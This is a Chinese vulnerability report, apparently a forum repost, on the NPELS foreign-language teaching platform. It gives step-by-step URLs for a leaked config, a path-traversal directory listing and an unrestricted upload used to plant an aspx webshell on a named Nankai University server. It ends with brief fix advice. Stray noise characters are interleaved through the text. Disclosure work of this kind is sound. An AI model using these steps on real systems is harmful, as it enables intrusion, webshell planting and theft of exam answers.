新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
& P1 ?% O8 w9 f, v7 {; I. q9 E
详细说明：
5 M8 I; k3 ~) w
以南开大学的为例:
http://222.30.60.3/NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>
3 b$ _# c8 n: N$ E0 i4 U- H及版本号
<add key="TVersion" value="1, 0, 0, 2187">
- i5 S, [3 _. w0 I: B; C</add>
4 u# L  ~# j, D, X. W& q* z直接访问
0 p. U9 o, i: S, D) ^1 Shttp://222.30.60.3/NPELS/CommonService.asmx
! r8 G. ^4 d4 Y1 C, y. ]( {5 d使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../

发现
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
5 K$ s$ w4 _# x' x6 A可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可
: o1 |1 O  b8 t( y) \% s, \, O3 v
OOXX

Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
漏洞证明：

列目录：
http://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
7 Z& i$ n% M7 U' q3 a& Ihttp://222.30.60.3/npelsv/editor/editor.htm
2 R8 e. u# ?  f7 p/ p
上传木马：
, n5 S  `1 N; q& f6 X+ ]- ghttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

修复方案：
好像考试系统必须使用 CommonService.asmx
$ P$ D5 w6 y( Q7 G最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​